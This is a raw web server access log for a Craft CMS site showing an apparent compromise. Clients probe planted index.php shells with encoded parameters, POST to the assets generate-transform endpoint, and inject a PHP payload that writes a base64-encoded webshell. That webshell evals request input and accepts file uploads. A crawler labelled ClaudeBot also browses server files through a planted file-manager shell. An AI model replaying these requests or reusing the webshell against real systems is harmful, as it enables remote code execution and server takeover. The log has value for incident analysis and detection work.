216.73.216.46 - - [21/Aug/2025:08:36:58 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2Ff7c78%2F. HTTP/2.0" 200 1503 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.004 "10143" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:37:01 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F.%2F. HTTP/2.0" 200 1502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.004 "10147" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:37:56 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F. HTTP/2.0" 200 1512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 343 0.007 "10110" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:37:59 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F. HTTP/2.0" 200 1510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.003 "10111" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:37:59 -0400] "GET /3534f/3534f/3534f/3534f/3534f/3534f/index.php?of=1 HTTP/2.0" 200 2318 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/82.0.1055.1 Safari/535.24" "62.164.177.242" 305 0.003 "6086" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:38:02 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F.%2F. HTTP/2.0" 200 1477 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.004 "8960" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:38:05 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2F. HTTP/2.0" 200 1482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "9064" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:08:38:46 -0400] "GET /vn.php HTTP/2.0" 403 449 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" "213.176.73.78" 364 0.001 "859" "0.001" "craft4.newsite.space"
213.176.73.78 - - [21/Aug/2025:08:38:46 -0400] "GET /vn.php HTTP/2.0" 403 449 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" "213.176.73.78" 365 0.001 "859" "0.001" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:08:38:46 -0400] "GET /craftt-api.php HTTP/2.0" 403 449 "https://test.newsite.space/vn.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" "213.176.73.78" 396 0.001 "859" "0.000" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:08:38:47 -0400] "GET /craftt-apii.php HTTP/2.0" 403 449 "https://test.newsite.space/craftt-api.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" "213.176.73.78" 402 0.001 "859" "0.001" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:08:38:47 -0400] "GET /craftt-api.php HTTP/2.0" 403 449 "https://craft4.newsite.space/vn.php" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" "213.176.73.78" 396 0.001 "859" "0.002" "craft4.newsite.space"
213.176.73.78 - - [21/Aug/2025:08:38:47 -0400] "GET /fxz.php HTTP/2.0" 403 449 "https://test.newsite.space/craftt-apii.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0" "213.176.73.78" 148 0.001 "859" "0.001" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:08:38:47 -0400] "GET /craftt-apii.php HTTP/2.0" 403 449 "https://craft4.newsite.space/craftt-api.php" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" "213.176.73.78" 402 0.001 "859" "0.000" "craft4.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:38:58 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2F. HTTP/2.0" 200 1721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 331 0.020 "19766" "0.020" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:39:01 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2F.gitignore HTTP/2.0" 200 946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 102 0.004 "2843" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:39:04 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fcomposer.json HTTP/2.0" 200 1396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.004 "4636" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:39:07 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2Ff7c78%2FrWIsghi.png HTTP/2.0" 200 3181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.004 "9101" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:40:17 -0400] "GET /cpresources/e9e49845/images/images/index.php?ARRAY=7o2230223n313735353738333631362p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738303031362q6431373161393531376632393439613064343838373563396136386164623363222p2232223n223239346364653734343334616463363466386236313265623531373566633934222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p2262696r675s70617373223n2232362q34342q35392q36352q37372q38352q3234227q HTTP/2.0" 200 315 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:72.0) Gecko/20100101 Firefox/72.0" "62.164.177.242" 627 0.971 "1011" "0.971" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:08:41:01 -0400] "GET /fxz.php HTTP/2.0" 403 449 "https://craft4.newsite.space/craftt-apii.php" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" "213.176.73.78" 398 0.001 "859" "0.002" "craft4.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:42:55 -0400] "GET /3534f/3534f/3534f/3534f/index.php?of=1 HTTP/2.0" 200 2319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3980 Safari/537.36 Edg/80.0.145.1" "62.164.177.242" 310 0.013 "6111" "0.013" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:44:03 -0400] "GET /cpresources/9e85d86b/9e85d86b/index.php?of=1 HTTP/2.0" 200 2309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 279 0.008 "6000" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:44:10 -0400] "GET /assets/libs/font-awesome/fonts/fonts/index.php?ARRAY=7o2230223n313735353738333834392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738303234392q6262396563623632633231303839313732366238616331653166613662616466222p2232223n223162303432663964373033333566663637343964343338316664636163333831222p2233223n223330383332396133393332633765343031373463343963326233323930333265222p2262696r675s70617373223n2233302q33322q35382q36382q37392q38342q3130227q HTTP/2.0" 200 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" "62.164.177.242" 631 0.942 "1025" "0.942" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:44:43 -0400] "GET /cpresources/a091a247/a091a247/index.php?of=1 HTTP/2.0" 200 2342 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0" "62.164.177.242" 271 0.014 "6127" "0.014" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:44:43 -0400] "GET /cpresources/6df6f5d8/6df6f5d8/index.php?of=1 HTTP/2.0" 200 2095 "-" "Mozilla/5.0 (Linux; Android 10; Z832 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Mobile Safari/537.36" "62.164.177.242" 318 0.006 "5436" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:45:11 -0400] "GET /cpresources/b1daeca9/js/js/index.php?ARRAY=7o2230223n313735353738333931302p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738303331302q3437633830613932656664376564363938376666363534313735626466323065222p2232223n223337626538386532396233636535376334316430616265316161623763383437222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p2262696r675s70617373223n2231392q34322q35392q36342q37392q38312q3235227q HTTP/2.0" 200 358 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" "62.164.177.242" 507 0.985 "1159" "0.985" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:45:12 -0400] "GET /1cefc/1cefc/1cefc/1cefc/index.php?of=1 HTTP/2.0" 200 2081 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/83.0.1055.1 Safari/535.24" "62.164.177.242" 294 0.003 "5354" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:46:02 -0400] "GET /files/2023-01-24/2023-01-24/2023-01-24/2023-01-24/index.php?of=1 HTTP/2.0" 200 2111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" "62.164.177.242" 291 0.010 "5576" "0.011" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:46:22 -0400] "GET /assets/libs/font-awesome/css/css/index.php?of=1 HTTP/2.0" 200 2290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/103.0" "62.164.177.242" 280 0.009 "5824" "0.009" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:46:22 -0400] "GET /assets/css/.sass-cache/.sass-cache/index.php?of=1 HTTP/2.0" 200 2137 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/82.0.1055.1 Safari/535.24" "62.164.177.242" 301 0.009 "5586" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:47:22 -0400] "GET /3534f/3534f/3534f/index.php?of=1 HTTP/2.0" 200 2084 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" "62.164.177.242" 262 0.008 "5286" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:48:44 -0400] "GET /f7c78/f7c78/f7c78/index.php?of=1 HTTP/2.0" 200 2085 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:73.0) Gecko/20100101 Firefox/73.0" "62.164.177.242" 264 0.008 "5195" "0.009" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:49:07 -0400] "GET /images/images/images/index.php?of=1 HTTP/2.0" 200 2010 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 272 0.007 "5295" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:49:09 -0400] "GET /order/files/files/index.php?of=1 HTTP/2.0" 200 2262 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" "62.164.177.242" 267 0.003 "5914" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:49:57 -0400] "GET /f7c78/f7c78/f7c78/index.php?ARRAY=7o2230223n313735353738343139372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738303539372q3665613865363265663639313230336536663531623433356133353937316561222p2232223n223962636663333135393530633831613432343461616230306464393961346536222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p2262696r675s70617373223n2231372q34342q35382q37302q37312q38362q3139227q HTTP/2.0" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 622 0.007 "0" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:51:34 -0400] "GET /cpresources/a091a247/a091a247/index.php?of=1 HTTP/2.0" 200 2342 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:74.0) Gecko/20100101 Firefox/74.0" "62.164.177.242" 271 0.007 "6127" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:51:54 -0400] "GET /70f7c/70f7c/70f7c/index.php?of=1 HTTP/2.0" 200 2289 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:71.0) Gecko/20100101 Firefox/71.0" "62.164.177.242" 265 0.007 "6081" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:53:37 -0400] "GET /f7c78/f7c78/f7c78/f7c78/index.php?of=1 HTTP/2.0" 200 2348 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:72.0) Gecko/20100101 Firefox/72.0" "62.164.177.242" 268 0.009 "6241" "0.008" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:53:39 -0400] "GET /order/files/2023-01/2023-01/2023-01/index.php?of=1 HTTP/2.0" 200 2110 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 283 0.004 "5479" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:53:52 -0400] "GET /3534f/3534f/index.php?ARRAY=7o2230223n313735353738343433312p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738303833312q3266363263646138316565623236333737666265663762623963303563363831222p2232223n223433393035356232323966643131363062383230356563383961303939323665222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p2262696r675s70617373223n2231392q33312q36302q36312q37322q38392q3132227q HTTP/2.0" 200 335 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 617 0.976 "1014" "0.977" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:54:56 -0400] "GET /cpresources/a091a247/a091a247/index.php?ARRAY=7o2230223n313735353738343439362p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738303839362q3063393335636566313065646231623832333664306239333937303032613431222p2232223n226639393462616662353561313462313130623231343063653430366661376138222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p2262696r675s70617373223n2231382q34332q35352q37302q37312q38332q3135227q HTTP/2.0" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" "62.164.177.242" 655 0.006 "0" "0.006" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:59:24 -0400] "GET /images/images/images/images/index.php?ARRAY=7o2230223n313735353738343736332p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738313136332q3862663762376633623062396431653934363834653961313935623337373531222p2232223n223437623162323664656332343866663133313436376562323262333263343433222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p2262696r675s70617373223n2232392q33342q35352q36312q37322q38352q3137227q HTTP/2.0" 200 298 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/10.0.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 670 1.034 "965" "1.034" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:09:03:14 -0400] "GET /30a37/30a37/30a37/30a37/index.php?ARRAY=7o2230223n313735353738343939332p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738313339332q3332376561623962353732313138626362386636316434653531653238613536222p2232223n226638663330613962353236353931306463383539343438396266386431306463222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p2262696r675s70617373223n2232322q34322q35362q36362q37352q38382q3236227q HTTP/2.0" 200 354 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/102.0" "62.164.177.242" 627 0.971 "1148" "0.971" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:09:04:15 -0400] "GET /files/2023-01-24/2023-01-24/2023-01-24/index.php?of=1 HTTP/2.0" 200 2187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3760. Safari/537.36 Edg/77.0.141.7" "62.164.177.242" 319 0.006 "5467" "0.007" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:09:04:19 -0400] "GET /order/files/2023-07/c9b92769-9d4a-4fe2-90ce-e5c37234ab05/_350x82_crop_center-center_none/_350x82_crop_center-center_none/index.php?ARRAY=7o2230223n313735353738353035372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738313435372q3632643032663165396664343431343131383239303737366634383934303031222p2232223n226463336461343362643033393035306266373037653130333830396364643835222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p2262696r675s70617373223n2231372q33382q35342q36362q38302q38342q3134227q HTTP/2.0" 200 363 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.3282.140 Safari/537.36 Edge/18.17763" "62.164.177.242" 730 0.977 "1527" "0.977" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:09:09:03 -0400] "GET /f7c78/f7c78/f7c78/index.php?ARRAY=7o2230223n313735353738353334332p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353738313734332q3562326436656663386139663134386233613434393934333434656166373838222p2232223n223962636663333135393530633831613432343461616230306464393961346536222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p2262696r675s70617373223n2231372q34342q35382q37302q37312q38362q3139227q HTTP/2.0" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3980 Safari/537.36 Edg/80.0.145.1" "62.164.177.242" 657 0.006 "0" "0.006" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:14 -0400] "GET / HTTP/2.0" 302 0 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 358 0.445 "0" "0.446" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:14 -0400] "GET /shop/products HTTP/2.0" 200 6700 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 369 0.526 "74727" "0.526" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2Ff7c78%2F.%2Fcache.php HTTP/2.0" 200 4780 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 347 0.003 "7985" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2Ff80c1dcc HTTP/2.0" 200 1479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 341 0.003 "7903" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F70f7c%2F.%2F70f7c HTTP/2.0" 200 1500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.003 "9771" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F..%2Fbootstrap.php HTTP/2.0" 200 1214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.003 "3520" "0.004" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:31 -0400] "GET / HTTP/2.0" 302 0 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 853 0.515 "0" "0.515" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:32 -0400] "GET /shop/products HTTP/2.0" 200 6701 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 690 0.527 "74727" "0.526" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2Fcec54a4c HTTP/2.0" 200 1507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.004 "8279" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:33 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 500 174628 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 885 0.415 "174628" "0.415" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2Fphp.ini HTTP/2.0" 200 978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.003 "2995" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:36 -0400] "GET /index.php?p=admin/dashboard&a=<?=file_put_contents(\x22c057546adf31.php\x22,base64_decode(\x22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K\x22));die();?> HTTP/2.0" 302 0 "-" "PycURL/7.43.0.1 libcurl/7.86.0 OpenSSL/1.1.1 zlib/1.2.11 c-ares/1.18.1 libidn2/2.0.4 librtmp/2.3" "213.176.73.78" 749 0.429 "0" "0.429" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2Fphp.ini HTTP/2.0" 200 977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 217 0.003 "2996" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Faed7ab4c HTTP/2.0" 200 1479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 215 0.003 "7802" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:45 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Ff80c1dcc HTTP/2.0" 200 1478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 102 0.008 "7778" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fmodules%2F..%2Fcomposer.lock HTTP/2.0" 200 27660 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.010 "284422" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:09:10:51 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Fcec54a4c HTTP/2.0" 200 1504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.003 "8145" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:52 -0400] "GET /index.php?p=admin/dashboard HTTP/2.0" 302 0 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 1069 0.426 "0" "0.425" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:09:10:52 -0400] "GET /admin/login HTTP/2.0" 200 16970 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Windows NT 5.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0" "213.176.73.78" 1238 0.459 "59176" "0.460" "test.newsite.space"
